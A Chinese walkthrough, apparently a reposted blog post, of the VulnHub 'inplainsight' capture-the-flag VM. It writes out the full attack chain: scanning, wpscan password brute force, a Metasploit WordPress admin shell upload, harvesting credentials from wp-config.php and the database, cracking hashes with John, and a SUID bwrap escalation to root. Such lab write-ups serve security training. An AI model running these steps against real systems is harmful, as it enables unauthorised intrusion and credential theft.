今天实践的是vulnhub的inplainsight镜像,
下载地址,https://download.vulnhub.com/inplainsight/inplainsight1.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.176,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.176,
获取到靶机有80端口的http服务,
浏览器访问http://192.168.0.176,提示了index.htnl页面,
浏览器访问http://192.168.0.176/index.htnl,
点击图片,
点击Upload Image,
查看页面源码,
对编码进行明文转换,
echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d,
获取到so-dev-wordpress路径,
对路径进行扫描,dirb http://192.168.0.176/so-dev-wordpress,
确认是wordpress,
扫描用户,wpscan --url http://192.168.0.176/so-dev-wordpress --enumerate u,
获取到mike和admin,
进行密码暴破,wpscan --url http://192.168.0.176/so-dev-wordpress -U mike,admin -P /usr/share/wordlists/dirb/common.txt,
获取到用户名密码admin/admin1,
继续浏览器访问http://192.168.0.176/so-dev-wordpress,
提示了要通过域名进行访问,inplainsight,
修改hosts文件,192.168.0.176 inplainsight,
重新登录,确认邮件是对的,登录成功,
上metasploit,
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS 192.168.0.176
set TARGETURI /so-dev-wordpress
set USERNAME admin
set PASSWORD admin1
exploit
获取到metasploit shell,getuid确认不是root,
转成普通shell,再转成交互式shell,
python3 -c 'import pty;pty.spawn("/bin/sh")',
查看当前用户下的home路径,确认有joe和mike两个账户,
在上两层目录中查看到有wp-config.php,
内容中发现有数据库的用户名密码,
sodevwp/sodevwp/oZ2R3c2x7dLL6#hJ,
转成bash,访问数据库,mysql -u sodevwp -p,
use sodevwp;
show tables;
select * from sodevwp_users;
查看到admin和mike账户的密码hash,
保存到hash文件,用john进行暴破,
john hash -wordlist=/usr/share/wordlists/rockyou.txt,
获取到mike/skuxdelux,
切换到mike,su mike,
查看/etc/passwd文件,cat /etc/passwd,没获取到有用信息,
继续查看/etc/passwd-,获取到joe/SmashMouthNoThanks,
再继续切到joe,id确认不是root,
查找root权限的程序,find / -perm -u=s -type f 2>/dev/null,
获取到bwrap,执行bwrap,获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之inplainsight的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论